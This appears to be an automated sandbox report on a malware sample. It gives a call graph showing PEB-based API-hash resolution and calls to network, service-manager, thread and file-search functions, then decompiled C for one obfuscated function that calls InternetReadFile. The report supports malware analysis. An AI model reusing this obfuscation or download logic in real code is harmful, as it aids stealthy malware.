4076 f4d7d7 3560->4076 3567 f4df2d GetPEB 3565->3567 3566->3560 3567->3568 3568->3459 3570 f4db7c 3569->3570 3571 f4dda9 3570->3571 3580 f4dda7 3570->3580 4100 f423b4 3570->4100 4091 f4196f 3571->4091 3574 f4ddbb 4095 f4a711 3574->4095 3579 f517f0 2 API calls 3579->3580 3580->3459 3584 f44e0f 3581->3584 3582 f44edf 3582->3459 3584->3582 4116 f442f4 3584->4116 4120 f4b8ff 3584->4120 3587 f572f2 3586->3587 3588 f5765b GetPEB 3587->3588 3589 f5754c 3587->3589 3590 f4a681 2 API calls 3587->3590 3591 f50b16 GetPEB 3587->3591 3592 f5754a 3587->3592 3594 f48fe5 2 API calls 3587->3594 3597 f41a83 GetPEB 3587->3597 3598 f517f0 2 API calls 3587->3598 4124 f4c0d2 3587->4124 4128 f487aa 3587->4128 3588->3587 3593 f50b16 GetPEB 3589->3593 3590->3587 3591->3587 3592->3459 3593->3592 3594->3587 3597->3587 3598->3587 3600 f45a00 3599->3600 3601 f47e0c 2 API calls 3600->3601 3602 f45aac 3600->3602 3601->3600 3602->3459 4157 f4833e 3603->4157 3609 f47e0c 2 API calls 3608->3609 3610 f5329e 3609->3610 3610->3459 3616 f4ab62 3611->3616 3613 f48fe5 2 API calls 3613->3616 3614 f4ac52 3614->3460 3615 f5765b GetPEB 3615->3616 3616->3613 3616->3614 3616->3615 3617 f41a83 GetPEB 3616->3617 3618 f517f0 2 API calls 3616->3618 4164 f51108 3616->4164 3617->3616 3618->3616 3621 f515c9 3619->3621 3620 f51756 3620->3459 3621->3620 4190 f471ec 3621->4190 4209 f4c3fe 3621->4209 4218 f46509 3621->4218 4231 f5410d 3621->4231 3629 f49603 3626->3629 3627 f4dfab GetPEB 3627->3629 3628 f51a67 GetPEB 3628->3629 3629->3627 3629->3628 3630 f505ca GetPEB 3629->3630 3631 f49728 3629->3631 3630->3629 3631->3459 4360 f4ee36 3632->4360 3636 f4833e GetPEB 3635->3636 3644 f4b349 3636->3644 3637 f48fe5 GetPEB RtlAllocateHeap 3637->3644 3638 f4b46f 4364 f4e800 3638->4364 3640 f51a67 GetPEB 3640->3644 3641 f4b46d 3641->3459 3642 f42a5e GetPEB 3642->3644 3643 f41a83 GetPEB 3643->3644 3644->3637 3644->3638 3644->3640 3644->3641 3644->3642 3644->3643 3645 f517f0 RtlFreeHeap GetPEB 3644->3645 3645->3644 3651 f50632 3646->3651 3647 f543cb 2 API calls 3647->3651 3649 f47e0c 2 API calls 3649->3651 3650 f4712f GetPEB 3650->3651 3651->3647 3651->3649 3651->3650 3652 f50add 3651->3652 3653 f50adf 3651->3653 3654 f45b1f 5 API calls 3651->3654 3655 f519fd GetPEB 3651->3655 4382 f4c19e 3651->4382 3652->3459 3653->3652 3656 f543cb 2 API calls 3653->3656 3654->3651 3655->3651 3656->3653 3658 f4ee36 GetPEB 3657->3658 3659 f51072 3658->3659 3659->3459 3666 f4e5a6 3660->3666 3661 f4e787 3663 f42b19 2 API calls 3661->3663 3662 f4e785 3662->3459 3663->3662 3664 f44a84 2 API calls 3664->3666 3666->3661 3666->3662 3666->3664 3667 f51086 GetPEB 3666->3667 3668 f48fe5 2 API calls 3666->3668 3669 f42a5e GetPEB 3666->3669 3670 f517f0 2 API calls 3666->3670 4393 f4befb 3666->4393 3667->3666 3668->3666 3669->3666 3670->3666 3677 f4fb4c 3671->3677 3672 f50b16 GetPEB 3672->3677 3674 f4fc76 3676 f50b16 GetPEB 3674->3676 3675 f4fc74 3675->3459 3676->3675 3677->3672 3677->3674 3677->3675 3678 f4ad4b GetPEB 3677->3678 3679 f4a681 2 API calls 3677->3679 4397 f492da 3677->4397 3678->3677 3679->3677 3683 f44887 3680->3683 3682 f48fe5 2 API calls 3682->3683 3683->3682 3684 f44990 3683->3684 3685 f4df2d GetPEB 3683->3685 3686 f42a5e GetPEB 3683->3686 3687 f4e800 GetPEB 3683->3687 3688 f517f0 2 API calls 3683->3688 4401 f57fcc 3683->4401 3684->3459 3685->3683 3686->3683 3687->3683 3688->3683 3693 f4f216 3689->3693 3690 f4f846 3690->3459 3691 f481fe GetPEB 3691->3693 3692 f47e0c 2 API calls 3692->3693 3693->3690 3693->3691 3693->3692 3695 f4b4c6 3694->3695 3696 f5915e GetPEB 3695->3696 3697 f4b530 3696->3697 3697->3459 3701 f5861f 3698->3701 3699 f48fe5 2 API calls 3699->3701 3700 f4f908 2 API calls 3700->3701 3701->3699 3701->3700 3702 f42a5e GetPEB 3701->3702 3704 f58653 3701->3704 3706 f517f0 2 API calls 3701->3706 3708 f587ae 3701->3708 3712 f4e800 GetPEB 3701->3712 4419 f4ca31 3701->4419 4428 f4a4cc 3701->4428 4432 f4a3d6 3701->4432 3702->3701 3707 f4868b GetPEB 3704->3707 3706->3701 3710 f5866b 3707->3710 3708->3708 4415 f48001 3710->4415 3712->3701 3715 f58fe7 3714->3715 3716 f5915e GetPEB 3715->3716 3717 f59044 3716->3717 3717->3495 3720 f41030 3718->3720 3719 f51940 GetPEB 3719->3720 3720->3719 3721 f47e0c 2 API calls 3720->3721 3722 f4132f 3720->3722 3721->3720 3722->3495 3724 f461b1 3723->3724 3725 f5915e GetPEB 3724->3725 3726 f46200 3725->3726 3726->3495 3728 f5915e GetPEB 3727->3728 3729 f42fef 3728->3729 3729->3495 3731 f45073 3730->3731 3732 f5915e GetPEB 3731->3732 3733 f450d4 3732->3733 3733->3500 3735 f57f72 3734->3735 3736 f5915e GetPEB 3735->3736 3737 f57fb9 CreateThread 3736->3737 3737->3512 3742 f4241b 3737->3742 3739 f4147d 3738->3739 3740 f5915e GetPEB 3739->3740 3741 f414d8 3740->3741 3741->3509 3751 f42842 3742->3751 3743 f543cb 2 API calls 3743->3751 3744 f47e0c 2 API calls 3744->3751 3746 f42a36 3748 f42b19 2 API calls 3746->3748 3747 f42a34 3748->3747 3751->3743 3751->3744 3751->3746 3751->3747 3755 f44a84 3751->3755 3759 f4df2d 3751->3759 3763 f4868b 3751->3763 3767 f58e1b 3751->3767 3771 f50db4 3751->3771 3775 f47d88 3751->3775 3756 f44ab1 3755->3756 3757 f5915e GetPEB 3756->3757 3758 f44b0c CreateFileW 3757->3758 3758->3751 3760 f4df45 3759->3760 3779 f57e05 3760->3779 3764 f486a1 3763->3764 3765 f5915e GetPEB 3764->3765 3766 f4870b 3765->3766 3766->3751 3768 f58e49 3767->3768 3769 f5915e GetPEB 3768->3769 3770 f58ec6 3769->3770 3770->3751 3772 f50dca 3771->3772 3773 f5915e GetPEB 3772->3773 3774 f50e34 3773->3774 3774->3751 3776 f47d9b 3775->3776 3777 f5915e GetPEB 3776->3777 3778 f47e01 3777->3778 3778->3751 3780 f57e2a 3779->3780 3781 f5915e GetPEB 3780->3781 3782 f4dfa0 3781->3782 3782->3751 3784 f5a0d4 3783->3784 3794 f4b53c 3784->3794 3787 f5a290 3787->3516 3789 f5a27c 3790 f42b19 2 API calls 3789->3790 3790->3787 3801 f45b1f 3791->3801 3795 f5915e GetPEB 3794->3795 3796 f4b599 3795->3796 3796->3787 3797 f47d00 3796->3797 3798 f47d1d 3797->3798 3799 f5915e GetPEB 3798->3799 3800 f47d74 QueryFullProcessImageNameW 3799->3800 3800->3789 3807 f45b45 3801->3807 3802 f45dfc 3803 f42b19 2 API calls 3802->3803 3805 f459e2 3803->3805 3804 f590e0 2 API calls 3804->3807 3805->3516 3806 f53fe4 2 API calls 3806->3807 3807->3802 3807->3804 3807->3805 3807->3806 3808 f523a0 2 API calls 3807->3808 3808->3807 3810 f5278d 3809->3810 3812 f47e0c 2 API calls 3810->3812 3817 f5320d 3810->3817 3818 f44508 3810->3818 3821 f4d9e0 GetPEB 3810->3821 3822 f45062 GetPEB 3810->3822 3823 f4be45 3810->3823 3827 f4ac5f 3810->3827 3831 f57579 3810->3831 3835 f593e4 3810->3835 3839 f4bbc0 3810->3839 3843 f58d0c 3810->3843 3812->3810 3819 f543cb 2 API calls 3817->3819 3818->3526 3818->3530 3819->3818 3821->3810 3822->3810 3824 f4be6c 3823->3824 3825 f5915e GetPEB 3824->3825 3826 f4bec0 3825->3826 3826->3810 3828 f4ac7e 3827->3828 3829 f5915e GetPEB 3828->3829 3830 f4acd4 3829->3830 3830->3810 3832 f575a1 3831->3832 3833 f5915e GetPEB 3832->3833 3834 f575fd 3833->3834 3834->3810 3836 f59419 3835->3836 3837 f5915e GetPEB 3836->3837 3838 f59474 CryptDecodeObjectEx 3837->3838 3838->3810 3840 f4bbe3 3839->3840 3841 f5915e GetPEB 3840->3841 3842 f4bc2e 3841->3842 3842->3810 3844 f5915e GetPEB 3843->3844 3845 f58d7c 3844->3845 3845->3810 3847 f4f102 3846->3847 3848 f5915e GetPEB 3847->3848 3849 f4f164 3848->3849 3849->3534 3851 f5109e 3850->3851 3852 f5915e GetPEB 3851->3852 3853 f510fd 3852->3853 3853->3534 3855 f44f97 3854->3855 3856 f47e0c 2 API calls 3855->3856 3858 f4502f 3856->3858 3857 f45056 3857->3542 3858->3857 3859 f543cb 2 API calls 3858->3859 3859->3857 3865 f46230 3860->3865 3861 f47e0c 2 API calls 3861->3865 3863 f464e1 3863->3542 3864 f464e3 3950 f481fe 3864->3950 3865->3861 3865->3863 3865->3864 3947 f505ca 3865->3947 3869 f4304d 3867->3869 3871 f47e0c 2 API calls 3869->3871 3872 f48fe5 2 API calls 3869->3872 3873 f43dc3 3869->3873 3875 f45868 2 API calls 3869->3875 3876 f543cb RtlFreeHeap GetPEB 3869->3876 3879 f43b2f 3869->3879 3881 f43b50 3869->3881 3883 f517f0 2 API calls 3869->3883 3962 f587b3 3869->3962 3966 f4974a 3869->3966 3970 f59289 3869->3970 3978 f4dad9 3869->3978 3982 f4bb27 3869->3982 3986 f59cd7 3869->3986 3995 f514bb 3869->3995 3998 f4e154 3869->3998 4002 f51ad1 3869->4002 3871->3869 3872->3869 3974 f45868 3873->3974 3875->3869 3876->3869 3884 f45868 2 API calls 3879->3884 3881->3542 3883->3869 3884->3881 3899 f45111 3888->3899 3892 f45840 3892->3542 3893 f45842 3893->3892 3896 f543cb 2 API calls 3893->3896 3896->3892 3897 f5819c GetPEB 3897->3899 3898 f47e0c 2 API calls 3898->3899 3899->3892 3899->3893 3899->3897 3899->3898 4021 f53f2d 3899->4021 4025 f4499d 3899->4025 4028 f4bd05 3899->4028 4032 f513b1 3899->4032 4036 f4fc95 3899->4036 3901 f483c2 3900->3901 3902 f4e7ad GetPEB 3901->3902 3903 f483e8 3902->3903 3903->3542 3906 f49e2f 3904->3906 3905 f5819c GetPEB 3905->3906 3906->3905 3907 f513b1 GetPEB 3906->3907 3908 f4a3b8 3906->3908 3909 f4499d GetPEB 3906->3909 3910 f4a3cb 3906->3910 3913 f47e0c 2 API calls 3906->3913 4040 f5998b 3906->4040 4044 f58d8a 3906->4044 3907->3906 3908->3910 3911 f543cb 2 API calls 3908->3911 3909->3906 3910->3542 3911->3910 3913->3906 3916 f5915e GetPEB 3915->3916 3917 f51ac8 3916->3917 3917->3542 3919 f41aa8 3918->3919 3920 f4e7ad GetPEB 3919->3920 3921 f41ac8 3920->3921 3921->3542 3923 f51a67 GetPEB 3922->3923 3924 f46084 3923->3924 3925 f51a67 GetPEB 3924->3925 3926 f46091 3925->3926 3927 f51a67 GetPEB 3926->3927 3928 f460a8 3927->3928 3929 f4919c GetPEB 3928->3929 3930 f460ef 3929->3930 3930->3542 3934 f491d7 3931->3934 3932 f492d0 3932->3542 3934->3932 4048 f44eec 3934->4048 3945 f53826 3935->3945 3936 f47e0c 2 API calls 3936->3945 3938 f51a67 GetPEB 3938->3945 3939 f53a8d 3939->3542 3940 f517f0 RtlFreeHeap GetPEB 3940->3945 3941 f44eec GetPEB 3941->3945 3942 f5819c GetPEB 3942->3945 3943 f4c95d GetPEB 3943->3945 3944 f4196f GetPEB RtlAllocateHeap 3944->3945 3945->3936 3945->3938 3945->3939 3945->3940 3945->3941 3945->3942 3945->3943 3945->3944 4056 f4935e 3945->4056 4060 f471aa 3945->4060 3948 f51a67 GetPEB 3947->3948 3949 f505f5 3948->3949 3949->3865 3951 f48217 3950->3951 3954 f5819c 3951->3954 3955 f581b6 3954->3955 3958 f4e0d2 3955->3958 3959 f4e0ed 3958->3959 3960 f5915e GetPEB 3959->3960 3961 f48307 3960->3961 3961->3863 3963 f587e5 3962->3963 3964 f5915e GetPEB 3963->3964 3965 f58833 InternetConnectW 3964->3965 3965->3869 3967 f4976e 3966->3967 3968 f5915e GetPEB 3967->3968 3969 f497cc InternetOpenW 3968->3969 3969->3869 3971 f592bd 3970->3971 3972 f5915e GetPEB 3971->3972 3973 f59316 HttpOpenRequestW 3972->3973 3973->3869 3975 f4587e 3974->3975 3976 f5915e GetPEB 3975->3976 3977 f458dc InternetCloseHandle 3976->3977 3977->3881 3979 f4dafc 3978->3979 3980 f5915e GetPEB 3979->3980 3981 f4db4b HttpSendRequestW 3980->3981 3981->3869 3983 f4bb41 3982->3983 3984 f5915e GetPEB 3983->3984 3985 f4bbaf ObtainUserAgentString 3984->3985 3985->3869 3992 f59eef 3986->3992 3988 f59ff6 3989 f5a00d 3988->3989 3990 f543cb 2 API calls 3988->3990 3989->3869 3990->3989 3991 f47e0c GetPEB RtlAllocateHeap 3991->3992 3992->3988 3992->3991 3993 f5819c GetPEB 3992->3993 3994 f543cb 2 API calls 3992->3994 4009 f414e6 3992->4009 3993->3992 3994->3992 4013 f42293 3995->4013 3999 f4e171 3998->3999 4000 f5915e GetPEB 3999->4000 4001 f4e1d7 4000->4001 4001->3869 4007 f51af6 4002->4007 4004 f51d4b 4004->3869 4005 f51d4d 4006 f46ed1 GetPEB 4005->4006 4006->4004 4007->4004 4007->4005 4008 f47e0c 2 API calls 4007->4008 4017 f46ed1 4007->4017 4008->4007 4010 f41505 4009->4010 4011 f5915e GetPEB 4010->4011 4012 f41562 InternetReadFile 4011->4012 4012->3992 4014 f422b6 4013->4014 4015 f5915e GetPEB 4014->4015 4016 f42308 4015->4016 4016->3869 4018 f46efc 4017->4018 4019 f5915e GetPEB 4018->4019 4020 f46f61 4019->4020 4020->4007 4022 f53f5c 4021->4022 4023 f5915e GetPEB 4022->4023 4024 f53fca 4023->4024 4024->3899 4026 f5915e GetPEB 4025->4026 4027 f449fe 4026->4027 4027->3899 4029 f4bd34 4028->4029 4030 f5915e GetPEB 4029->4030 4031 f4bd9e 4030->4031 4031->3899 4033 f513d4 4032->4033 4034 f5915e GetPEB 4033->4034 4035 f51441 4034->4035 4035->3899 4037 f4fcb8 4036->4037 4038 f5915e GetPEB 4037->4038 4039 f4fd0c 4038->4039 4039->3899 4041 f599b0 4040->4041 4042 f5915e GetPEB 4041->4042 4043 f599fa 4042->4043 4043->3906 4045 f58db2 4044->4045 4046 f5915e GetPEB 4045->4046 4047 f58e05 4046->4047 4047->3906 4049 f44eff 4048->4049 4052 f5175d 4049->4052 4053 f51773 4052->4053 4054 f5915e GetPEB 4053->4054 4055 f44f6c 4054->4055 4055->3934 4057 f49383 4056->4057 4058 f4e7ad GetPEB 4057->4058 4059 f493a5 4058->4059 4059->3945 4061 f471c6 4060->4061 4062 f4e7ad GetPEB 4061->4062 4063 f471e4 4062->4063 4063->3945 4065 f5767d 4064->4065 4066 f5915e GetPEB 4065->4066 4067 f576d5 4066->4067 4067->3560 4069 f4a69a 4068->4069 4070 f5915e GetPEB 4069->4070 4071 f4a702 OpenSCManagerW 4070->4071 4071->3560 4073 f50b2b 4072->4073 4074 f5915e GetPEB 4073->4074 4075 f50b7b 4074->4075 4075->3560 4079 f4d909 4076->4079 4077 f4df2d GetPEB 4077->4079 4078 f4d9bc 4087 f519fd 4078->4087 4079->4077 4079->4078 4081 f4d9ba 4079->4081 4083 f4712f 4079->4083 4081->3560 4084 f47144 4083->4084 4085 f5915e GetPEB 4084->4085 4086 f47196 4085->4086 4086->4079 4088 f51a0f 4087->4088 4089 f5915e GetPEB 4088->4089 4090 f51a58 4089->4090 4090->4081 4092 f41981 4091->4092 4093 f47e0c 2 API calls 4092->4093 4094 f41a18 4093->4094 4094->3574 4094->4094 4108 f5a5cd 4095->4108 4099 f4a8a3 4104 f57614 4099->4104 4101 f423c9 4100->4101 4102 f5915e GetPEB 4101->4102 4103 f4240d 4102->4103 4103->3570 4105 f57636 4104->4105 4106 f4e7ad GetPEB 4105->4106 4107 f4dded 4106->4107 4107->3579 4109 f5a5e9 4108->4109 4110 f5915e GetPEB 4109->4110 4111 f4a84e 4110->4111 4111->4099 4112 f54330 4111->4112 4113 f5435e 4112->4113 4114 f5915e GetPEB 4113->4114 4115 f543b5 GetVolumeInformationW 4114->4115 4115->4099 4117 f44307 4116->4117 4118 f5915e GetPEB 4117->4118 4119 f44384 GetNativeSystemInfo 4118->4119 4119->3584 4121 f4b914 4120->4121 4122 f5915e GetPEB 4121->4122 4123 f4b970 4122->4123 4123->3584 4125 f4c11e 4124->4125 4126 f5915e GetPEB 4125->4126 4127 f4c177 4126->4127 4127->3587 4133 f487d9 4128->4133 4129 f48fca 4131 f543cb 2 API calls 4129->4131 4130 f543cb 2 API calls 4130->4133 4134 f48fd9 4131->4134 4133->4129 4133->4130 4133->4134 4137 f47e0c GetPEB RtlAllocateHeap 4133->4137 4138 f50b16 GetPEB 4133->4138 4140 f51a67 GetPEB 4133->4140 4141 f4ad4b 4133->4141 4145 f58c3b 4133->4145 4149 f4231f 4133->4149 4153 f4f882 4133->4153 4134->3587 4137->4133 4138->4133 4140->4133 4142 f4ad67 4141->4142 4143 f5915e GetPEB 4142->4143 4144 f4adb5 4143->4144 4144->4133 4146 f58c7c 4145->4146 4147 f5915e GetPEB 4146->4147 4148 f58cce 4147->4148 4148->4133 4150 f42349 4149->4150 4151 f5915e GetPEB 4150->4151 4152 f4239e 4151->4152 4152->4133 4154 f4f89e 4153->4154 4155 f5915e GetPEB 4154->4155 4156 f4f8f7 4155->4156 4156->4133 4158 f5915e GetPEB 4157->4158 4159 f48390 4158->4159 4160 f51849 4159->4160 4161 f51864 4160->4161 4162 f5915e GetPEB 4161->4162 4163 f4ae96 4162->4163 4163->3459 4165 f51134 4164->4165 4174 f5932f 4165->4174 4170 f42b19 2 API calls 4171 f5138f 4170->4171 4172 f42b19 2 API calls 4171->4172 4173 f5136f 4172->4173 4173->3616 4175 f59349 4174->4175 4182 f47ec7 4175->4182 4178 f44178 4179 f441b2 4178->4179 4180 f5915e GetPEB 4179->4180 4181 f44213 4180->4181 4181->4170 4181->4173 4183 f47ee2 4182->4183 4186 f5407d 4183->4186 4187 f54099 4186->4187 4188 f5915e GetPEB 4187->4188 4189 f47f59 4188->4189 4189->4178 4239 f58f66 4190->4239 4193 f42b19 2 API calls 4203 f4796b 4193->4203 4196 f479e7 4196->3621 4197 f51108 2 API calls 4197->4203 4198 f543cb RtlFreeHeap GetPEB 4198->4203 4199 f47e0c 2 API calls 4199->4203 4200 f479d2 4204 f543cb 2 API calls 4200->4204 4201 f4712f GetPEB 4201->4203 4202 f48fe5 2 API calls 4202->4203 4203->4193 4203->4196 4203->4197 4203->4198 4203->4199 4203->4200 4203->4201 4203->4202 4206 f41a83 GetPEB 4203->4206 4207 f5765b GetPEB 4203->4207 4208 f517f0 2 API calls 4203->4208 4242 f5a69b 4203->4242 4246 f41bf7 4203->4246 4259 f483f0 4203->4259 4265 f52433 4203->4265 4204->4196 4206->4203 4207->4203 4208->4203 4216 f4c6b9 4209->4216 4210 f4c821 4210->3621 4211 f4c823 4213 f543cb 2 API calls 4211->4213 4212 f47e0c 2 API calls 4212->4216 4213->4210 4214 f57f4d 6 API calls 4214->4216 4216->4210 4216->4211 4216->4212 4216->4214 4286 f588c2 4216->4286 4298 f4eb26 4216->4298 4225 f46bcc 4218->4225 4219 f46dba 4219->3621 4221 f46da8 4224 f543cb 2 API calls 4221->4224 4222 f47e0c 2 API calls 4222->4225 4223 f4adc7 GetPEB 4223->4225 4224->4219 4225->4219 4225->4221 4225->4222 4225->4223 4227 f51108 2 API calls 4225->4227 4229 f41bf7 5 API calls 4225->4229 4230 f42b19 GetPEB FindCloseChangeNotification 4225->4230 4319 f41673 4225->4319 4327 f4ace8 4225->4327 4330 f59494 4225->4330 4227->4225 4229->4225 4230->4225 4237 f5423f 4231->4237 4232 f54315 4234 f543cb 2 API calls 4232->4234 4233 f54313 4233->3621 4234->4233 4235 f51108 2 API calls 4235->4237 4236 f47e0c 2 API calls 4236->4237 4237->4232 4237->4233 4237->4235 4237->4236 4238 f41bf7 5 API calls 4237->4238 4238->4237 4240 f5915e GetPEB 4239->4240 4241 f58fc8 4240->4241 4241->4203 4243 f5a6cc 4242->4243 4244 f5915e GetPEB 4243->4244 4245 f5a713 4244->4245 4245->4203 4256 f420a0 4246->4256 4247 f4df2d GetPEB 4247->4256 4248 f42268 4248->4203 4250 f44a84 2 API calls 4250->4256 4251 f4226a 4253 f42b19 2 API calls 4251->4253 4252 f4868b GetPEB 4252->4256 4253->4248 4254 f48fe5 2 API calls 4254->4256 4256->4247 4256->4248 4256->4250 4256->4251 4256->4252 4256->4254 4257 f41a83 GetPEB 4256->4257 4258 f517f0 2 API calls 4256->4258 4270 f50e90 4256->4270 4278 f47f60 4256->4278 4257->4256 4258->4256 4263 f48416 4259->4263 4260 f48665 4261 f481fe GetPEB 4260->4261 4264 f48663 4261->4264 4262 f47e0c 2 API calls 4262->4263 4263->4260 4263->4262 4263->4264 4264->4203 4266 f52449 4265->4266 4267 f4bdba GetPEB 4266->4267 4268 f5275c 4266->4268 4269 f47e0c 2 API calls 4266->4269 4267->4266 4268->4203 4269->4266 4271 f50ea4 4270->4271 4272 f51a67 GetPEB 4271->4272 4273 f50f77 4272->4273 4274 f505ca GetPEB 4273->4274 4275 f50fcc 4274->4275 4282 f4dfab 4275->4282 4279 f47f85 4278->4279 4280 f5915e GetPEB 4279->4280 4281 f47fea 4280->4281 4281->4256 4285 f4dfe9 4282->4285 4283 f4e0c7 4283->4256 4284 f44eec GetPEB 4284->4285 4285->4283 4285->4284 4287 f588e9 4286->4287 4297 f58c2d 4287->4297 4302 f50542 4287->4302 4290 f5819c GetPEB 4293 f58bac 4290->4293 4291 f58bf6 4306 f4aea0 4291->4306 4292 f5819c GetPEB 4292->4293 4293->4291 4293->4292 4297->4216 4299 f4eb3a 4298->4299 4300 f4debf GetPEB 4299->4300 4301 f4ebfb 4300->4301 4301->4216 4303 f5055f 4302->4303 4304 f5915e GetPEB 4303->4304 4305 f505b7 4304->4305 4305->4290 4305->4297 4307 f4afea 4306->4307 4309 f4af76 4306->4309 4307->4297 4311 f4debf 4307->4311 4308 f4f176 GetPEB 4308->4309 4309->4307 4309->4308 4315 f59053 4309->4315 4312 f4dedc 4311->4312 4313 f5915e GetPEB 4312->4313 4314 f4df1d 4313->4314 4314->4297 4316 f59069 4315->4316 4317 f5915e GetPEB 4316->4317 4318 f590d1 4317->4318 4318->4309 4326 f41698 4319->4326 4321 f41949 4322 f42b19 2 API calls 4321->4322 4323 f41947 4322->4323 4323->4225 4325 f4ace8 GetPEB 4325->4326 4326->4321 4326->4323 4326->4325 4340 f48716 4326->4340 4344 f413cc 4326->4344 4328 f5915e GetPEB 4327->4328 4329 f4ad42 4328->4329 4329->4225 4338 f594ce 4330->4338 4332 f59967 4356 f45e20 4332->4356 4334 f59965 4334->4225 4335 f5932f GetPEB 4335->4338 4336 f48fe5 2 API calls 4336->4338 4338->4332 4338->4334 4338->4335 4338->4336 4339 f517f0 2 API calls 4338->4339 4348 f4bc43 4338->4348 4352 f46106 4338->4352 4339->4338 4341 f4873c 4340->4341 4342 f5915e GetPEB 4341->4342 4343 f48791 4342->4343 4343->4326 4345 f413e5 4344->4345 4346 f5915e GetPEB 4345->4346 4347 f41453 4346->4347 4347->4326 4349 f4bc87 4348->4349 4350 f5915e GetPEB 4349->4350 4351 f4bce3 4350->4351 4351->4338 4353 f46122 4352->4353 4354 f5915e GetPEB 4353->4354 4355 f46185 4354->4355 4355->4338 4357 f45e32 4356->4357 4358 f5915e GetPEB 4357->4358 4359 f45e8a 4358->4359 4359->4334 4361 f4ee4d 4360->4361 4362 f5915e GetPEB 4361->4362 4363 f4eeab 4362->4363 4363->3459 4365 f4e81f 4364->4365 4366 f5932f GetPEB 4365->4366 4367 f4ea85 4366->4367 4368 f5932f GetPEB 4367->4368 4369 f4ea9e 4368->4369 4370 f5932f GetPEB 4369->4370 4371 f4eab7 4370->4371 4372 f519fd GetPEB 4371->4372 4373 f4eaca 4372->4373 4374 f519fd GetPEB 4373->4374 4375 f4eae2 4374->4375 4378 f458e7 4375->4378 4379 f458fc 4378->4379 4380 f5915e GetPEB 4379->4380 4381 f45952 4380->4381 4381->3641 4383 f4c1be 4382->4383 4384 f4c3c9 4383->4384 4385 f4c3cb 4383->4385 4388 f47e0c 2 API calls 4383->4388 4389 f4ba75 4383->4389 4384->3651 4387 f4ba75 GetPEB 4385->4387 4387->4384 4388->4383 4390 f4baa2 4389->4390 4391 f5915e GetPEB 4390->4391 4392 f4bb0a 4391->4392 4392->4383 4394 f4bf17 4393->4394 4395 f5915e GetPEB 4394->4395 4396 f4bf6d 4395->4396 4396->3666 4398 f492ec 4397->4398 4399 f5915e GetPEB 4398->4399 4400 f49353 4399->4400 4400->3677 4402 f57fe3 4401->4402 4403 f48fe5 2 API calls 4402->4403 4404 f58159 4403->4404 4411 f4c83b 4404->4411 4407 f517f0 2 API calls 4408 f58180 4407->4408 4409 f4ec03 2 API calls 4408->4409 4410 f58194 4409->4410 4410->3683 4412 f4c859 4411->4412 4413 f4e7ad GetPEB 4412->4413 4414 f4c875 4413->4414 4414->4407 4416 f48013 4415->4416 4417 f5915e GetPEB 4416->4417 4418 f48069 4417->4418 4418->3460 4425 f4ccc7 4419->4425 4420 f4cdd9 4444 f4817c 4420->4444 4423 f4cdd7 4423->3701 4424 f48fe5 2 API calls 4424->4425 4425->4420 4425->4423 4425->4424 4427 f517f0 2 API calls 4425->4427 4436 f57e8f 4425->4436 4440 f58ee1 4425->4440 4427->4425 4429 f4a4eb 4428->4429 4430 f5915e GetPEB 4429->4430 4431 f4a545 4430->4431 4431->3701 4433 f4a3fb 4432->4433 4434 f5915e GetPEB 4433->4434 4435 f4a44e 4434->4435 4435->3701 4437 f57ec5 4436->4437 4438 f5915e GetPEB 4437->4438 4439 f57f32 4438->4439 4439->4425 4441 f58ef6 4440->4441 4442 f5915e GetPEB 4441->4442 4443 f58f57 4442->4443 4443->4425 4445 f48190 4444->4445 4446 f5915e GetPEB 4445->4446 4447 f481f2 4446->4447 4447->4423 4448 f4b5a9 4449 f4833e GetPEB 4448->4449 4451 f4b6ed 4449->4451 4450 f4b79d 4451->4450 4452 f47e0c 2 API calls 4451->4452 4453 f4b783 4452->4453 4453->4450 4454 f519fd GetPEB 4453->4454 4454->4450 4491 f5a29b 4497 f5a4e6 4491->4497 4492 f5a59f 4500 f576e8 4492->4500 4493 f4868b GetPEB 4493->4497 4495 f5a59d 4496 f48fe5 2 API calls 4496->4497 4497->4492 4497->4493 4497->4495 4497->4496 4498 f42a5e GetPEB 4497->4498 4499 f517f0 2 API calls 4497->4499 4498->4497 4499->4497 4510 f57724 4500->4510 4502 f48fe5 GetPEB RtlAllocateHeap 4502->4510 4504 f4c83b GetPEB 4504->4510 4505 f57dfb 4505->4495 4506 f517f0 RtlFreeHeap GetPEB 4506->4510 4508 f42a5e GetPEB 4508->4510 4509 f576e8 5 API calls 4509->4510 4510->4502 4510->4504 4510->4505 4510->4506 4510->4508 4510->4509 4511 f49124 4510->4511 4515 f4a461 4510->4515 4519 f44a0a 4510->4519 4512 f4913c 4511->4512 4513 f5915e GetPEB 4512->4513 4514 f4918d FindNextFileW 4513->4514 4514->4510 4516 f4a476 4515->4516 4517 f5915e GetPEB 4516->4517 4518 f4a4bd FindFirstFileW 4517->4518 4518->4510 4520 f44a1f 4519->4520 4521 f5915e GetPEB 4520->4521 4522 f44a79 4521->4522 4522->4510

                                                                                                                                Executed Functions

                                                                                                                                Function 00F414E6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenetworkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 736 f414e6-f41576 call f4bb26 call f5915e InternetReadFile
                                                                                                                                C-Code - Quality: 62%
                                                                                                                                			E00F414E6(void* __ecx, void* __edx, intOrPtr _a4, DWORD* _a8, void* _a12, void* _a16, long _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t28;
				int _t33;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00F4BB26(_t28);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x242353;
				_v24 = 0x635419;
				_v20 = 0x414480;
				_v12 = 0x1a41;
				_v12 = _v12 + 0xffffa6c5;
				_v12 = _v12 ^ 0xffffc9c6;
				_v8 = 0xcb6a;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00007e4d;
				E00F5915E(0x113, 0x979fff61, 0x699633b1);
				_t33 = InternetReadFile(_a12, _a16, _a20, _a8); // executed
				return _t33;
			}











                                                                                                                                0x00f414ec
                                                                                                                                0x00f414ef
                                                                                                                                0x00f414f2
                                                                                                                                0x00f414f5
                                                                                                                                0x00f414f8
                                                                                                                                0x00f414fb
                                                                                                                                0x00f41500
                                                                                                                                0x00f41505
                                                                                                                                0x00f4150c
                                                                                                                                0x00f41518
                                                                                                                                0x00f4151f
                                                                                                                                0x00f41526
                                                                                                                                0x00f4152d
                                                                                                                                0x00f41534
